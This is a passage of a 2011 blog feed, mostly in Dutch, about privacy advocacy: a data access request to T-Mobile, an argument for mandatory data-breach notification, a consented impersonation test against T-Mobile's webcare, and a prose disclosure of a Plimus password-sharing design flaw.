timeing had&amp;nbsp;niet beter kunnen zijn. Ik krijg opeens van alle kanten vragen over 
cookies,&amp;nbsp;hackers en het volggedrag van Google en Facecook. Ik zie dat als een 
goede&amp;nbsp;ontwikkeling en we kunnen het ons niet veroorloven om hier niks mee te doen.&lt;br /&gt;
&lt;br /&gt;
&lt;!--more--&gt;&lt;br /&gt;
Het het belanggrijkste punt waar veel winst te halen valt is bewustwording.&amp;nbsp;Veel mensen 
lijken zich nu bewust te zijn van het feit dat er gevaren zijn op&amp;nbsp;het internet. Maar het 
gevaar bestaat dat mensen dit normaal gaan vinden. Ik zou&amp;nbsp;graag zien dat mensen het niet 
meer accepteren dat bedrijven ongevraagd&amp;nbsp;informatie over ze verzamelen of dat bedrijven 
vooral zichzelf lijken te&lt;br /&gt;
beschermen in plaats van de klanten als er een lek plaatsvind. De bewustwording&amp;nbsp;begint met 
het inzichtelijk maken wat bedrijven voor informatie verzamelen. De&amp;nbsp;Privacy Inzage Machine 
(https://pim.bof.nl) is daar een heel goed hulpmiddel&amp;nbsp;voor door het doen van een 
inzageverzoek (Art. 35 Wbp) aanzienlijk te&amp;nbsp;vereenvoudigen. Maar de drempel is nogsteeds 
hoog, dus zullen er een aantal&amp;nbsp;publieke voorbeelden moeten zijn voor de mensen die zelf geen 
inzageverzoeken&amp;nbsp;opsturen. Ook als een bedrijf de fout ingaat door bijvoorbeeld data te 
lekken is&amp;nbsp;het heel belangrijk om hier aandacht aan te geven. Niet alleen dat er gelekt 
is,&amp;nbsp;maar ook hoe het bedrijf daarmee is omgegaan. Als een bedrijf goed omgaat met&amp;nbsp;een 
lek laat dit dan ook duidelijk blijken, maar als een bedrijf een lek stil&amp;nbsp;probeert te houden 
of verantwoordelijkheid afschuift laat dan ook heel duidelijk&amp;nbsp;blijken dat dit niet 
geaccepteerd word.&lt;br /&gt;
&lt;br /&gt;
Tegelijk met de bewustwording moet ook de naleving van de wet aangepakt worden.&amp;nbsp;Het is heel 
verlijdelijk om te denken dat als iets niet goed gaat dat er nieuwe&amp;nbsp;wetten geschreven moeten 
worden, maar meer wetten hebben geen zin als de huidige&amp;nbsp;wetten bijna niet nageleefd worden. 
Bedrijven kunnen bijvoorbeeld weigeren de&amp;nbsp;transparantie te geven die ze verplicht zijn te 
geven onder Art. 35 Wbp. Als&amp;nbsp;individu is de drempel om hier tegenin te gaan zodanig hoog dat 
in de praktijk&amp;nbsp;niemand dat doet. Het College bescherming persoonsgegevens, de 
toezichthouder&amp;nbsp;van de Wbp is van beperkt in haar vermogen om overtreders aan te pakken. 
Dit&amp;nbsp;komt deels vanwege de beperkte mogenlijkheden om maatregelen te nemen en 
deels&amp;nbsp;vanwege een gebrek aan mankracht.&lt;br /&gt;
&lt;br /&gt;
Al met al is er nog genoeg te verbeteren op het gebied van online privay en&amp;nbsp;andere vormen 
van privacy. Maar voordat nieuwe wetten of andere ingrijpende&amp;nbsp;maatregelen effect zullen zijn 
moet eerst de bewustwording vergroot en&amp;nbsp;de naleving van de wet krachtiger afgedwongen 
worden.
</summary>
  </entry>
  <entry>
    <title>Inzageverzoek T-Mobile</title>
    <link href="http://floort.net/blog/inzageverzoek-t-mobile.html"></link>
    <id>http://floort.net/blog/inzageverzoek-t-mobile.html</id>
    <updated>2011-10-27T03:20:00Z</updated>
    <summary>&lt;div&gt;
    Zoals uit eerdere blogposts al is gebleken ben ik de laatste tijd
    wel eens bezig met T-Mobile en privacy. In mijn laatste &lt;a
        href=&#34;http://floorter.blogspot.com/2011/08/t-mobile-continued.html&#34;&gt;blogpost&lt;/a&gt;
    heb ik geschreven dat ik bij T-Mobile op het hoofdkantoor langs ben
    geweest om te praten over de beveiliging van de webcare helpdesk.
    Wat ik niet heb geschreven is dat ik daar ook wat anders besproken
    heb.&lt;br /&gt;
    &lt;br /&gt;
    &lt;!--more--&gt;&lt;br /&gt;&lt;br /&gt;
    &lt;a
        href=&#34;http://draft.blogger.com/blogger.g?blogID=115714525576844309&#34;
        name=&#34;more&#34;&gt;&lt;/a&gt;Ik ben al een lange tijd actief bij &lt;a
        href=&#34;https://www.bof.nl/&#34;&gt;Bits of Freedom&lt;/a&gt; en bij BoF heb ik
    meegewerkt aan de &lt;a href=&#34;https://pim.bof.nl/&#34;&gt;Privacy Inzage
        Machine&lt;/a&gt;. PIM is een hulpmiddel die inzichtelijk moet maken
    wat voor gegevens bedrijven verzamelen over mensen. Het
    belangrijkste hulpmiddel hierbij is &lt;a
        href=&#34;http://wetten.overheid.nl/BWBR0011468/geldigheidsdatum_27-10-2011#Hoofdstuk6_Artikel35&#34;&gt;artikel
        35&lt;/a&gt; van de Wet bescherming persoonsgegevens. Volgens dit
    wetsartikel heeft iedereen recht om de persoonsgegevens die een
    instelling over hem of haar verwerkt in te zien. PIM helpt mensen
    door automatisch een brief te genereren die gebruikt kan worden om
    deze inzage te verzoeken.&lt;br /&gt;
    &lt;br /&gt;
    Ondertussen heb ik hartstikke leuk code lopen schrijven voor PIM,
    maar ik had zelf nog nooit van mijn inzagerecht gebruik gemaakt. Wat
    een mooi toeval dat ik T-Mobile tegenkwam. De bewaarplicht
    telecomgegevens zat mij al een hele tijd dwars en ik wilde wel eens
    weten wat T-Mobile allemaal over mij verzamelde. De brief die PIM
    voor mij maakte was mij net niet specifiek genoeg, dus heb ik de
    voorbeeldbrief van het &lt;a href=&#34;http://www.cbpweb.nl/&#34;&gt;CBP&lt;/a&gt;
    genomen en ligt aangepast door specifiek naar de gegevens te vragen
    die onder de Wet bewaarplicht telecommunicatiegegevens vallen. Het
    resultaat was dit &lt;a
        href=&#34;https://docs.google.com/open?id=0ByT63K1KXzHfZjBjMGViZjUtNmQzYS00NWU0LTljNjItYWE2MWUyMThlYmYw&#34;&gt;inzageverzoek&lt;/a&gt;
    (Privacygevoelige gegevens zijn vervangen door een $Placeholder).&lt;br
    /&gt;
    &lt;br /&gt;
    Aan het eind van het gesprek bij T-Mobile besloot ik mijn brief te
    overhandigen aan de Data Protection Officer van T-Mobile. Ik heb
    vervolgens mondeling toegelicht dat ik met die gegevens niet alleen
    inzicht wil krijgen, maar ook aan mensen laten zien wat een impact
    de bewaarplicht telecomgegevens heeft. Daarbij heb ik ook uitgelegd
    dat ik de gegevens als een digitaal bestand zou willen hebben zodat
    ik er mee kan werken en visualisaties kan maken zoals de Zeit dat
    heeft gedaan bij &lt;a
        href=&#34;http://www.zeit.de/datenschutz/malte-spitz-data-retention&#34;&gt;Malte
        Spitz&lt;/a&gt; (Aanrader!). Ik kreeg te horen dat dit ongebruikelijk
    was en dat T-Mobile normaal niet meer dan 10 dagen aan data geeft.
    Ze zouden bespreken wat ze ermee zouden doen, maar gaven aan dat ze
    niet zomaar een uitzondering wilden maken. Toch had ik goede hoop;
    T-Mobile had namelijk net mijn gegevens gelekt en ik was speciaal
    naar het hoofdkantoor gekomen om ook nog een gratis waardevol
    beveiligingsadvies te geven. Daar had ik toch vast wel wat goodwill
    mee gecreÃƒÂ«erd. &lt;br /&gt;
    &lt;br /&gt;
    Bijna vier weken later werd ik een beetje ongeduldig. Ik had
    namelijk begrepen dat ze met mij zouden bespreken wat ze precies met
    mijn verzoek zouden doen. Dat bleek niet het geval, ze zouden het
    intern bespreken. Dat wist ik nog niet, dus ik besloot zelf maar
    contact op te nemen. Dat misverstand heeft ook bij T-Mobile voor wat
    verwarring verzorgt, maar die middag werd ik netjes opgebeld door de
    Data Protection Officer van T-Mobile. Ik was toen toevallig op de
    redactie van Sargasso aan het werk.&lt;br /&gt;
    &lt;br /&gt;
    Als eerste werd het misverstand over wie met wie zou overleggen uit
    de wereld geholpen. Daarna hebben we het gehad over in inhoud die ik
    zou krijgen. Dat bleek namelijk toch die standaard 10 dagen te zijn
    en T-Mobile had zelf voor mij gekozen welke 10 dagen. Ik was
    natuurlijk niet blij met dat ik niet alles kreeg, maar dat T-Mobile
    geheel zelfstandig heeft besloten de 10 dagen te kiezen, zonder met
    mij contact op te nemen vond ik onbeleefd. Toen mij verteld werd dat
    ze me niet alle gegevens wilden geven omdat anders mensen gingen
    denken dat T-Mobile zoveel gegevens over iedereen verzameld konden
    de journalisten bij wie ik aan tafel zat hun lach bijna niet
    inhouden. Het hele punt is juist dat T-Mobile zoveel gegevens
    verzameld over al hun klanten. Net als elke andere telecomprovider,
    ze zijn dit namelijk bij wet verplicht. Een paar dagen later kreeg
    ik een dikke enveloppe met daarin wat gegevens over mijn abonnement
    en 42 pagina&#39;s gegevens over locaties, telefoongesprekken en smsjes
    over een periode van 10 dagen.&lt;br /&gt;
    &lt;br /&gt;
    Daar was ik het natuurlijk niet mee eens. Ik heb recht op alles en
    ik krijg maar 2.7%. Bovendien op papier, daar kan ik geen mooie
    visualisaties van maken. Ik besloot een brief op te stellen waarin
    ik uitleg wat ik precies wil en waarom ik denk daar recht op te
    hebben. Ik heb het geluk om een flink aantal uitstekende juristen te
    kennen en af en toe op een symposium of bij een lezing nog meer
    juristen tegen te komen. Mijn brief heb ik aan een hoop juristen
    laten lezen een ik ben ze allen heel erg dankbaar voor hun feedback.
    Maar wat mij opviel wat dat alle juristen die ik sprak het in
    interessante zaak vonden, allen vonden dat ik in mijn recht sta om
    dit te eisen, dat ik er eigenlijk een rechtszaak van zou moeten
    maken en (voor mijn ego het belangrijkste) dat mijn brief juridisch
    goed onderbouwd was. &lt;br /&gt;
    &lt;br /&gt;
    Voordat ik mijn brief had opgestuurd gebeurde er iets opmerkelijks.
    Na een gesprek met de manager van het @tmobile_webcare team over
    mijn abonnement kwam ik erachter dat er iets mis was met mijn My
    T-Mobile account. De helpdesk zou het probleem oplossen en contact
    met mij opnemen als het probleem opgelost zou zijn. En de volgende
    dag kreeg ik inderdaad te horen dat het probleem opgelost was. Dat
    gebeurde in een publieke tweet met daarbij nog meer informatie over
    mijn abonnement. Opmerkelijk, ik had kortgeleden nog expliciet
    uitgelegd hoe dit soort fouten te voorkomen zijn. Maar als ik de
    betreffende medewerkster hierop aanspreek kreeg ik te horen dat het
    helemaal geen privacygevoelige gegevens waren en als ik dat niet
    wilde had ik maar moeten zeggen dat ik het liever in een DM had
    gewild. Dat is natuurlijk de omgekeerde wereld!&lt;br /&gt;
    &lt;br /&gt;
    Ondertussen ben ik mijn vertrouwen in de zorgvuldigheid van T-Mobile
    verloren. Twee keer heb ik ze gewaarschuwd wat er fout kan gaan en
    twee keer gaat het fout. Ik heb een kleine toevoeging gedaan aan de
    &lt;a
        href=&#34;https://docs.google.com/open?id=0ByT63K1KXzHfMjJlN2U2YmYtOTllMi00N2E3LTk4ZjItNjkyYWJlYjdhMDY3&#34;&gt;brief&lt;/a&gt;
    en hem verstuurd aan T-Mobile. Vandaag heb ik dus een antwoord van
    T-Mobile ontvangen. Het antwoord komt er ruwweg op neer dat T-Mobile
    mijn argumenten naast zich neerlegt en alsnog niet ingaat op mijn
    inzageverzoek.&lt;br /&gt;
    &lt;br /&gt;
    Hieronder een kopie van het antwoord van T-Mobile. Over wat ik nu
    van plan ben zal ik nog geen uitspraken doen, maar ik ben niet van
    plan om het hierbij te laten.&lt;br /&gt;
    &lt;br /&gt;
    &lt;div class=&#34;separator&#34; style=&#34;clear: both; text-align: center;&#34;&gt;
        &lt;a
            href=&#34;http://2.bp.blogspot.com/-98OdKp7e2wk/TqixZ8-aC9I/AAAAAAAABRk/CspvSH5KrXs/s1600/tweede_antw_tmobile_page1.png&#34;
            imageanchor=&#34;1&#34; style=&#34;margin-left: 1em; margin-right:
            1em;&#34;&gt;&lt;img border=&#34;0&#34; height=&#34;320&#34;
            src=&#34;http://2.bp.blogspot.com/-98OdKp7e2wk/TqixZ8-aC9I/AAAAAAAABRk/CspvSH5KrXs/s320/tweede_antw_tmobile_page1.png&#34;
            width=&#34;237&#34; /&gt;&lt;/a&gt;&lt;/div&gt;
    &lt;br /&gt;
    &lt;div class=&#34;separator&#34; style=&#34;clear: both; text-align: center;&#34;&gt;
    &lt;/div&gt;
    &lt;div class=&#34;separator&#34; style=&#34;clear: both; text-align: center;&#34;&gt;
        &lt;a
            href=&#34;http://3.bp.blogspot.com/-ZLIXGGt9EXs/TqmZ0-iN7HI/AAAAAAAABSA/xx3tfLM91A8/s1600/tweede_antw_tmobile_page2.png&#34;
            imageanchor=&#34;1&#34; style=&#34;margin-left: 1em; margin-right:
            1em;&#34;&gt;&lt;img border=&#34;0&#34; height=&#34;116&#34;
            src=&#34;http://3.bp.blogspot.com/-ZLIXGGt9EXs/TqmZ0-iN7HI/AAAAAAAABSA/xx3tfLM91A8/s320/tweede_antw_tmobile_page2.png&#34;
            width=&#34;320&#34; /&gt;&lt;/a&gt;&lt;/div&gt;
    &lt;br /&gt;
    &lt;br /&gt;
    &lt;br /&gt;
    Edit: Op vrijdag 28 oktober 2011 13:14 heeft Tweakers.net een &lt;a
        href=&#34;http://tweakers.net/nieuws/77672/t-mobile-weigert-alle-gebruikersdata-te-overhandigen-na-verzoek.html&#34;&gt;artikel&lt;/a&gt;
    over mijn blogpost geplaatst.&lt;br /&gt;
    &lt;br /&gt;
    &lt;br /&gt;
    &lt;br /&gt;&lt;/div&gt;
</summary>
  </entry>
  <entry>
    <title>Waarom is een meldplicht datalekken nodig?</title>
    <link href="http://floort.net/blog/waarom-is-een-meldplicht-datalekken-nodig.html"></link>
    <id>http://floort.net/blog/waarom-is-een-meldplicht-datalekken-nodig.html</id>
    <updated>2011-09-20T02:01:00Z</updated>
    <summary>Veel bedrijven hebben tegenwoordig grote databases met gegevens over mensen. Soms gaat er wel 
eens iets fout en dan liggen de gegevens van een heleboel mensen op straat. Ik wil dat zodra 
gegevens lekken dat het bedrijf (of overheid!) verplicht is zonder onnodige vertraging alle 
betrokkenen in te lichten over de lek. Ik zal proberen een aantal redenen te geven waarom deze 
meldplicht nodig is.&lt;br /&gt;
&lt;br /&gt;
&lt;!--more--&gt;&lt;b&gt;Schadebeperking&lt;/b&gt; &lt;br /&gt;
Bij een datalek zijn vaak veel mensen een slachtoffer. Afhankelijk van wat er gelekt is kan het 
heel verstandig zijn om wachtwoorden&amp;nbsp;te veranderen, &lt;br /&gt;
apps te deinstalleren of in extreme&amp;nbsp;gevallen zelfs identiteitsdiefstal verzekering af te 
sluiten. De realiteit&amp;nbsp;is echter dat&amp;nbsp;de bedrijven die lekken vaak helemaal niet willen 
toegeven dat er data gelekt is. Het is dan onmogelijk&amp;nbsp;om zelf maatregelen&amp;nbsp;te nemen. Ook 
als het bedrijf gegevens lekt door een inbraak en het bedrijf doet aangifte tegen de dader hebben 
de slachtoffers van de lek daar niets aan. Ze kunnen hun eigen data er niet door terugkrijgen en 
het zal ook niet helpen om ze te informeren&amp;nbsp;over de lek.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Je recht om te weten wat er met je data gebeurd&lt;/b&gt;&lt;br /&gt;
Volgens de wet bescherming persoonsgegevens heeft iedereen recht om te weten met welke doelen 
zijn of haar persoonsgegevens verzameld worden en aan wie deze gegevens verstrekt worden. Sterker 
nog: verwerkers van persoonsgegevens hebben zelfs de plicht om in een &lt;a 
href=&#34;http://www.cbpweb.nl/asp/ORSearch.asp&#34;&gt;openbaar register&lt;/a&gt; te registreren wat voor 
gegevens ze verzamelen, met welk doel en aan wie de gegevens verstrekt worden. Het zou vreemd 
zijn als een bedrijf onder deze plicht vandaan kan komen als het verstrekken van de gegevens 
onbedoeld was. Ik zou juist willen stellen dat de principes achter het openbare register zoals 
gedefineerd in de Wbp juist extra sterk van toepassing zijn op gelekte gegevens. Ik zou dan ook 
deze principes willen doortrekken en bedrijven willen verplichten om ook datalekken te laten 
registreren in een vergelijkbaar register.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Concurreren op veiligheid&lt;/b&gt;&lt;br /&gt;
Veiligheid van gegevens gaat een steeds belangrijkere rol spelen diensten. Maar stel dat je een 
bedrijf wilt uitkiezen die veilig omgaat met je gegevens, hoe werkt dat in de praktijk? In de 
praktijk kies je een bedrijf uit op het vertrouwen dat ze uitstralen, maar als je echt dieper 
gaat kijken zal je ontdekken dat vertrouwen en veiligheid slechts losjes verband hebben met 
elkaar. Je kan het vergelijken met voedsel; als je wilt dat mensen een geïnformeerde beslissing 
kunnen nemen over wat ze eten verplicht je producenten transparant te zijn over de ingrediënten. 
Het is lastig om alle interne procedures van een bedrijf die van invloed zijn op de veiligheid 
van gegevens openbaar te maken. Maar wat je wel kan is een bedrijf verplichten om te vermelden de 
bescherming van de gevoelige gegevens mislukt is. Als klant kan je dan in ieder geval kiezen voor 
een bedrijf dat weinig fouten gemaakt heeft.&lt;br /&gt;
&lt;br /&gt;
Als je het idee hebt dat ik iets over het hoofd&amp;nbsp;gezien heb, een fout gemaakt heb, of als je 
het gewoon niet met mij eens bent lees ik het graag in de comments. 
</summary>
  </entry>
  <entry>
    <title>T-Mobile - Continued</title>
    <link href="http://floort.net/blog/t-mobile-continued.html"></link>
    <id>http://floort.net/blog/t-mobile-continued.html</id>
    <updated>2011-08-31T14:20:00Z</updated>
    <summary>Gisteren heb ik een heel goed gesprek gehad bij T-Mobile in Den Haag. Ik werd vriendelijk 
ontvangen door Ruud Huigsloot (Manager E-Services&amp;amp;Webcare Internet &amp;amp; New Media), iemand 
van pr en de juriste die o.a. verantwoordelijk is voor de privacybescherming van klanten. Het 
gesprek was informeel, ik vond het zelfs gezellig, maar wel inhoudelijk.&lt;br /&gt;
&lt;br /&gt;
Na een korte voorstelronde heb ik kort herhaald wat er gebeurd is vanuit mijn perspectief. Het 
punt wat voor mij het belangrijkste was, het ontkennen van de lek door T-Mobile, heb ik in 
perspectief kunnen plaatsen. Niet alleen was de situatie niet helemaal representatief omdat 
T-Mobile wist dat er een journalist bij betrokken was, emoties werden ook belangrijk in de 
reacties van T-Mobile omdat ze zich nogal in de maling genomen voelden. Juist het feit dat 
T-Mobile zich anders gaat gedragen onder druk is een kwetsbaarheid en het niet informeren van de 
klant is naar mijn mening altijd fout. Maar omdat T-Mobile zich dit ook heel goed lijkt te 
beseffen en omdat de situatie niet helemaal representatief is voor een echte identiteitsdiefstal 
heb ik wel begrip voor de afwijkende behandeling door T-Mobile.&lt;br /&gt;
&lt;br /&gt;
Ook de lek zelf heeft natuurlijk aandacht gekregen. Natuurlijk waren we het er snel over eens dat 
beveiliging complex is, zeker als je ook rekening moet houden met klantvriendelijkheid. Toch heb 
ik een paar suggesties kunnen doen die een minimale impact hebben op de klantvriendelijkheid en 
een paar die mogelijk zelfs de klanten een veiliger gevoel geven (en als een bonus ook nog 
bijdragen aan de echte veiligheid). Ik heb het gevoel over dat T-Mobile een flink aantal van deze 
suggesties zal gaan implementeren en dat alle klanten en T-Mobile zelf een stukje veiliger zijn 
als gevolg.&lt;br /&gt;
&lt;br /&gt;
Natuurlijk is het de moeite waard om T-Mobile goed in de gaten te houden. Het kan altijd een 
klein stukje veiliger.&lt;br /&gt;
&lt;br /&gt;
P.S.&lt;br /&gt;
Voor degenen die ongerust waren: T-Mobile heeft in geen enkel opzicht gedreigd met juridische 
stappen, mij willen ontvoeren of mij op een andere manier lastig willen vallen.&lt;br /&gt;
Voor degenen met suggesties dat ik dikke zakken geld moest vragen: Dat heb ik niet gedaan en 
T-Mobile heeft ook niets aangeboden (helaas ;-)). Er is mij echter wel 4 keer een kopje thee 
aangeboden waarvan ik er slechts 1 geaccepteerd heb. Deze positieve blogpost is dus slechts het 
gevolg van een goed gesprek en omkoping met een kopje thee.
</summary>
  </entry>
  <entry>
    <title>T-Mobile&#39;s &#34;menselijke fouten&#34;</title>
    <link href="http://floort.net/blog/t-mobile-s-menselijke-fouten.html"></link>
    <id>http://floort.net/blog/t-mobile-s-menselijke-fouten.html</id>
    <updated>2011-08-27T16:21:00Z</updated>
    <summary>Zoals elk modern bedrijf heeft ook T-Mobille een Twitter account om vragen van klanten te kunnen 
beantwoorden en mensen te informeren over storingen en onderhoud. Zoals elke brave klant volg ik 
dan ook &lt;a href=&#34;https://twitter.com/#%21/tmobile_webcare&#34;&gt;@tmobile_webcare&lt;/a&gt; zodat ik van elke 
bui die een storing veroorzaakt op de hoogte blijf.&lt;br /&gt;
&lt;br /&gt;
Wat blijkt: Ik ben niet de enige. Een aantal van de mensen die ik volg op Twitter zijn ook 
T-Mobile klanten en maken af en toe ook gebruik van &lt;a 
href=&#34;https://twitter.com/#%21/tmobile_webcare&#34;&gt;@tmobile_webcare&lt;/a&gt; waardoor ik het hele gesprek 
over en weer kan volgen. Meestal verzoekt &lt;a 
href=&#34;https://twitter.com/#%21/tmobile_webcare&#34;&gt;@tmobile_webcare&lt;/a&gt; vrij snel om het gesprek 
over DM (Direct Message, oftwel berichten die niet publiek zijn) voort te zetten. Logisch, want 
je wilt niet zomaar je telefoonnummer of adres twitteren. Toch komt het wel eens voor dat er iets 
mis gaat en er toch gevoelige gegevens openbaar gemaakt worden. Een sterk voorbeeld daarvan is 
het publiceren van login naam en wachtwoord van een klant (Bron: &lt;a 
href=&#34;http://webwereld.nl/nieuws/67203/t-mobile-tweet-inlogdata-klant---update.html&#34;&gt;Webwereld&lt;/a&gt;). 
Nadat ik zelf een aantal onhandige tweets van T-Mobile had opgemerkt besloot ik er wat over te 
zeggen. &lt;br /&gt;
&lt;br /&gt;
Het blijkt allemaal wel mee te vallen. Volgens &lt;a 
href=&#34;https://twitter.com/#%21/tmobile_webcare&#34;&gt;@tmobile_webcare&lt;/a&gt; zijn de onfortuinlijke 
tweets slechts incidenten en menselijke fouten. Niets om me zorgen over te maken. Een paar uur 
later geef ik maar de hint dat het misschien wel verstandig is om de tweets te verwijderen. Bijna 
meteen zijn ze verwijderd, maar geen bericht van &lt;a 
href=&#34;https://twitter.com/#%21/tmobile_webcare&#34;&gt;@tmobile_webcare&lt;/a&gt; om mij te bedanken voor dit 
diepgaande inzicht. Ze zullen het wel druk hebben.&lt;br /&gt;
&lt;br /&gt;
Dan neemt Joost Schellevis, een journalist, contact met mij op met de vraag of ik vrijwillig 
slachtoffer wil worden van identiteitsdiefstal. Het plan is dat hij zich voordoet als mij en 
probeert mijn factuur te krijgen van T-Mobile. Als dit zou lukken toont het niet alleen aan dat 
de onzorgvuldigheid van T-Mobile geen losstaande foutjes zijn, maar ook dat het door 
kwaadwillenden te misbruiken is. Ik ga akkoord en al snel staat en een nep Floor Terra op Twitter 
en Gmail. Een klein beetje Googlen en zoeken in het telefoonboek en er is genoeg over mij bekend 
om naar T-Mobile te stappen.&lt;br /&gt;
&lt;br /&gt;
Niet veel later krijg ik een email, geadresseerd aan 3 verschillende email adressen, met daarin 
een gif attachment die mijn factuur bevat. Nadat ik van de schok bekomen ben dat ze mijn factuur 
als gif rondmailen besef ik dat 2 van de 3 email adressen niet van mij zijn. Een van de email 
adressen herken ik zelfs niet als een vals email adres van mij. Na even navragen bij Joost blijkt 
hij nog een email adres voor de valse mij te hebben aangemaakt. Omdat het versturen van de 
factuur niet lukte had Joost een ander email adres gegeven en heeft T-Mobile besloten om de 
factuur aan alle email adressen van &#34;mij&#34; te versturen. Erg slordig. &lt;br /&gt;
&lt;br /&gt;
Ik krijg ook nog 2 keer een sms&amp;nbsp; met daarin de melding dat mijn &#34;My T-Mobile&#34; account 
gereset is en ik een nieuwe login naam en wachtwoord krijg. En daarna blijft het een maand 
stil.&lt;br /&gt;
&lt;br /&gt;
Dan besluit Joost contact op te nemen met T-Mobile om te vertellen wat er aan de hand is en om 
een reactie te vragen. Zoals te verwachten is T-Mobile niet blij. Ik wacht even af en vraag de 
volgende dag, alsof ik nergens vanaf weet, waar die rare smsjes toch vandaan kwamen. Ik wilde 
T-Mobile zelf de kans geven om het aan mij te vertellen. Wat er gebeurde had ik totaal niet 
verwacht. T-Mobile werd boos op Joost omdat ze dachten dat Joost geen toestemming had gevraagd. 
Ondertussen is T-Mobile tegen mij aan het ontkennen dat er iets aan de hand is. Ik dacht een 
mooie oplossing gevonden te hebben: als T-Mobile niet geloofd dat ik mijn toestemming heb gegeven 
aan de Joost, laat ze dan contact met mij opnemen om het te vragen. Dat scheen volgens T-Mobile 
geen goed idee te zijn omdat ik het toch al wist. Vreemd, want tegen mij wilden ze niet toegeven 
wat er aan de hand was.&lt;br /&gt;
&lt;br /&gt;
Pas toen ik liet blijken dat ik wist wat voor gesprek er gaande was tussen Joost en T-Mobile 
gaven ze toe. Maar ze bleven stellig beweren dat het een menselijke fout was, dat niets 100% 
veilig kan zijn en dat dit niet te maken had met de onzorgvuldigheid waar ik eerder heel 
duidelijk voor gewaarschuwd had. Nadat de discussie zich uitbreidde naar andere mensen op Twitter 
wilde T-Mobile een afspraak met mij maken. Ik heb komende dinsdag anderhalf uur de tijd om te 
praten met een aantal mensen van T-Mobile en ze uit te leggen wat er volgens mij beter kan.&lt;br /&gt;
&lt;br /&gt;
Ik zou zeggen: wordt vervolgt.&lt;br /&gt;
</summary>
  </entry>
  <entry>
    <title>Plimus is working on issues</title>
    <link href="http://floort.net/blog/plimus-is-working-on-issues.html"></link>
    <id>http://floort.net/blog/plimus-is-working-on-issues.html</id>
    <updated>2011-06-24T12:58:00Z</updated>
    <summary>This morning I got a phone call from a phone number in Isreal. It was Tal, an engineer from 
Plimus. Tal wanted to know about the issues I had found and what solutions I had in mind. Tal 
also explained their plans for fixing all issues and all the issues that are involved with 
changing their API.&lt;br /&gt;
&lt;br /&gt;
I&#39;ll be keeping an eye on Plimus to see how they are doing, but now I&#39;m confident that someone at 
Plimus understands their security issues and they are working on fixing them.&lt;br /&gt;
&lt;br /&gt;
I still have an important message for Plimus and every other company that receives security 
advice from a random person from the internet.&lt;br /&gt;
Be happy that person tells you about the security issues and doesn&#39;t abuse them in secret.&lt;br /&gt;
&lt;br /&gt;
And when you receive security advice, you should handle it well. I have spend months exchanging 
emails and twitter messages and writing several blogposts &amp;nbsp;only to get marketing people 
telling me I&#39;m confused. Just one phone call from Tal was more informative for both me and for 
Plimus than all those months together.&lt;br /&gt;
&lt;br /&gt;
Don&#39;t wait months before forwarding issues to engineers.
</summary>
  </entry>
  <entry>
    <title>Plimus vulnerability: Sharing customer password in plaintext</title>
    <link href="http://floort.net/blog/plimus-vulnerability-sharing-customer-password-in-plaintext.html"></link>
    <id>http://floort.net/blog/plimus-vulnerability-sharing-customer-password-in-plaintext.html</id>
    <updated>2011-06-21T21:29:00Z</updated>
    <summary>It&#39;s been a while since my last post about Plimus. I have contacted Plimus multiple times since 
and still haven&#39;t got any response from someone with even a basic knowledge of security. They did 
however visit my blog and that gave me enough information to figure out that their customer 
support system stores passwords in plaintext. But what I want to write about is worse.&lt;br /&gt;
&lt;br /&gt;
&lt;!--more--&gt;Let me start by saying that what I am going to write about is not a bug, not an 
unpatched piece of software and not a subtle design flaw. It&#39;s a feature.&lt;br /&gt;
&lt;br /&gt;
What kind of feature would that be?&lt;br /&gt;
Imagine&amp;nbsp;you have a webshop and you use Plimus as a payment processor. Your customers will 
need a Plimus login to handle their payments, and a login to &amp;nbsp;your shop to view their 
purchase status, or download the content they purchased. Remembering two different account 
credentials is way too difficult for your customers, so you want to streamline their shopping 
experience.&lt;br /&gt;
&lt;br /&gt;
I can almost hear you say: &#34;Use OpenID!&#34;, and you&amp;nbsp;would&amp;nbsp;be right. If 
Plimus&amp;nbsp;would&amp;nbsp;have used some kind of OpenID or OAuth system everybody whould be happy. 
The customers would have a secure way to use their Plimus login on your webshop. Both you and 
Plimus could have used standard, free, well tested and opensource software. And you get all kinds 
of extra features for free, such as retraction of&amp;nbsp;authorization.&lt;br /&gt;
&lt;br /&gt;
Plimus invented their own system described as &#34;Capture Customer Login Credentials&#34;. What this 
system does is&amp;nbsp;comparable&amp;nbsp;to the &lt;i&gt;IPN&lt;/i&gt; system.&amp;nbsp;Every time the shopper changes 
their account credentials, the webshop can choose to&amp;nbsp;receive&amp;nbsp;a notification. This 
notification is send as a HTTP POST to a url specified by the webshop. The following information 
is send:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&#34;separator&#34; style=&#34;clear: both; text-align: center;&#34;&gt;&lt;a 
href=&#34;http://4.bp.blogspot.com/-_vm4vRXJLKU/TgEEI0z4weI/AAAAAAAAAwE/rltW06LN6nw/s1600/plimus_table.png&#34; 
imageanchor=&#34;1&#34; style=&#34;margin-left: 1em; margin-right: 1em;&#34;&gt;&lt;img border=&#34;0&#34; height=&#34;128&#34; 
src=&#34;http://4.bp.blogspot.com/-_vm4vRXJLKU/TgEEI0z4weI/AAAAAAAAAwE/rltW06LN6nw/s320/plimus_table.png&#34; 
width=&#34;320&#34; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
When the webshop&amp;nbsp;receives&amp;nbsp;this message it will add the user to their local database or 
just change their password to match their new password at Plimus.&lt;br /&gt;
&lt;br /&gt;
I can&#39;t even come close to start describing all the things that are wrong with this, but here is 
my attempt:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Users are not notified about Plimus sharing their passwords.&lt;/li&gt;
&lt;li&gt;All information can be send over the internet without SSL, so all passwords can be 
sniffed.&lt;/li&gt;
&lt;li&gt;There is no authentication, so if I know the url I can create users at the target webshop or 
change credentials of&amp;nbsp;existing&amp;nbsp;users.&lt;/li&gt;
&lt;li&gt;The webshops themselves have the credentials to login to the customer&#39;s Plimus account with 
full access.&lt;/li&gt;
&lt;li&gt;There is no procedure for error recovery and credentials can get out of sync.&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;I bet you can think of more ways this could go wrong.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;If you use Plimus, I have some advice for you:&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;Run away and never 
come back&lt;/li&gt;
